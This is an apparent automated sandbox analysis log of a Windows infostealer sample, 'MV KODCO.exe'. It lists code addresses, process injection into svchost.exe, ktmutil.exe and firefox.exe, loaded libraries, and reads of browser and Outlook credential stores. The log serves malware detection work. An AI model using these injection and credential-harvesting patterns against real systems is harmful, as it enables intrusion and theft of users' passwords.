                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F405351_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA801_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF6BD71_2_02FF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB401_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E8F01_2_02F6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F268B81_2_02F268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A9A61_2_0300A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4A8401_2_02F4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F428401_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A01_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F569621_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEEDB1_2_02FFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52E901_2_02F52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFCE931_2_02FFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40E591_2_02F40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEE261_2_02FFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32FC81_2_02F32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBEFA01_2_02FBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4F401_2_02FB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60F301_2_02F60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE2F301_2_02FE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F82F281_2_02F82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30CF21_2_02F30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0CB51_2_02FE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40C001_2_02F40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3ADE01_2_02F3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F58DBF1_2_02F58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDCD1F1_2_02FDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4AD001_2_02F4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5D2F01_2_02F5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE12ED1_2_02FE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B2C01_2_02F5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F452A01_2_02F452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F8739A1_2_02F8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2D34C1_2_02F2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF132D1_2_02FF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF70E91_2_02FF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF0E01_2_02FFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEF0CC1_2_02FEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F470C01_2_02F470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300B16B1_2_0300B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4B1B01_2_02F4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2F1721_2_02F2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7516C1_2_02F7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF16CC1_2_02FF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F856301_2_02F85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF7B01_2_02FFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F314601_2_02F31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF43F1_2_02FFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030095C31_2_030095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDD5B01_2_02FDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF75711_2_02FF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEDAC61_2_02FEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDDAAC1_2_02FDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F85AA01_2_02F85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE1AA31_2_02FE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB3A6C1_2_02FB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFA491_2_02FFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7A461_2_02FF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB5BF01_2_02FB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7DBF91_2_02F7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FB801_2_02F5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFB761_2_02FFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F438E01_2_02F438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAD8001_2_02FAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F499501_2_02F49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B9501_2_02F5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD59101_2_02FD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F49EB01_2_02F49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD21_2_02F03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD51_2_02F03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFFB11_2_02FFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F41F921_2_02F41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFF091_2_02FFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFCF21_2_02FFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB9C321_2_02FB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FDC01_2_02F5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7D731_2_02FF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF1D5A1_2_02FF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F43D401_2_02F43D40
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028D00123_2_028D0012
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028F0A993_2_028F0A99
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028D1FE93_2_028D1FE9
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028D87293_2_028D8729
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028D00613_2_028D0061
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028D1DC93_2_028D1DC9
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028D1DC03_2_028D1DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 262 times
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: String function: 00606AC0 appears 42 times
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: String function: 005FEC2F appears 68 times
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: String function: 0060F8A0 appears 35 times
                Source: MV KODCO.exe, 00000000.00000003.1705038338.0000000003773000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV KODCO.exe
                Source: MV KODCO.exe, 00000000.00000003.1703349642.000000000391D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV KODCO.exe
                Source: MV KODCO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@7/4
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062CE7A GetLastError,FormatMessageW,0_2_0062CE7A
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061AB84 AdjustTokenPrivileges,CloseHandle,0_2_0061AB84
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0061B134
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0062E1FD
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00626532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00626532
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0063C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0063C18C
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005E406B
                Source: C:\Users\user\Desktop\MV KODCO.exeFile created: C:\Users\user\AppData\Local\Temp\aut1C3E.tmpJump to behavior
                Source: MV KODCO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ktmutil.exe, 00000007.00000002.2932130624.00000000032A2000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2160040456.00000000032A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MV KODCO.exeReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Users\user\Desktop\MV KODCO.exe "C:\Users\user\Desktop\MV KODCO.exe"
                Source: C:\Users\user\Desktop\MV KODCO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV KODCO.exe"
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\MV KODCO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV KODCO.exe"Jump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: MV KODCO.exeStatic file information: File size 1214976 > 1048576
                Source: MV KODCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: MV KODCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: MV KODCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: MV KODCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: MV KODCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: MV KODCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: MV KODCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cMOROZNpvCGcdz.exe, 00000003.00000000.1894546864.000000000077E000.00000002.00000001.01000000.00000005.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000000.2043472894.000000000077E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: MV KODCO.exe, 00000000.00000003.1705038338.0000000003650000.00000004.00001000.00020000.00000000.sdmp, MV KODCO.exe, 00000000.00000003.1709281897.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970845605.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1877929427.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1876115604.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970845605.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.000000000381E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1980153193.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1978038494.000000000331D000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.0000000003680000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MV KODCO.exe, 00000000.00000003.1705038338.0000000003650000.00000004.00001000.00020000.00000000.sdmp, MV KODCO.exe, 00000000.00000003.1709281897.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1970845605.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1877929427.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1876115604.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970845605.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.000000000381E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1980153193.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1978038494.000000000331D000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.0000000003680000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000001.00000002.1970664504.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970644379.0000000000800000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2932816797.0000000000898000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000001.00000002.1970664504.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970644379.0000000000800000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2932816797.0000000000898000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000007.00000002.2934218467.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2932130624.0000000003223000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000002.2933775906.0000000002DEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2269719976.0000000023BAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000007.00000002.2934218467.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2932130624.0000000003223000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000002.2933775906.0000000002DEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2269719976.0000000023BAC000.00000004.80000000.00040000.00000000.sdmp
                Source: MV KODCO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: MV KODCO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: MV KODCO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: MV KODCO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: MV KODCO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FE01E LoadLibraryA,GetProcAddress,0_2_005FE01E
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060C09E push esi; ret 0_2_0060C0A0
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060C187 push edi; ret 0_2_0060C189
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0064C8BC push esi; ret 0_2_0064C8BE
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00606B05 push ecx; ret 0_2_00606B18
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062B2B1 push FFFFFF8Bh; iretd 0_2_0062B2B3
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060BDAA push edi; ret 0_2_0060BDAC
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060BEC3 push esi; ret 0_2_0060BEC5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00436096 push eax; ret 1_2_004360E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004360BB push eax; ret 1_2_004360E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004368B9 push 49A0F8CEh; ret 1_2_00436912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00436970 push 49A0F8CEh; ret 1_2_00436912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0043692F push 49A0F8CEh; ret 1_2_00436912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004391FC push es; ret 1_2_00439202
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004249B6 push cs; iretd 1_2_004249BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004232E0 push eax; ret 1_2_004232E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00435A90 push ds; retf 1_2_00435A93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00431BB6 push ecx; retf 1_2_00431BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004265E5 push cs; ret 1_2_004265F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00424E33 push ds; iretd 1_2_00424E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D6C1 push ebp; retf 1_2_0042D6CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00424E91 push ds; iretd 1_2_00424E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0225F pushad ; ret 1_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F027FA pushad ; ret 1_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0283D push eax; iretd 1_2_02F02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx1_2_02F309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F01368 push eax; iretd 1_2_02F01369
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028C6A87 push ds; iretd 3_2_028C6A59
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028D7686 push ds; retf 3_2_028D7689
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028CF2B7 push ebp; retf 3_2_028CF2C0
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028C76CD push ss; retf 3_2_028C76D0
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeCode function: 3_2_028C6A29 push ds; iretd 3_2_028C6A59
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00648111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00648111
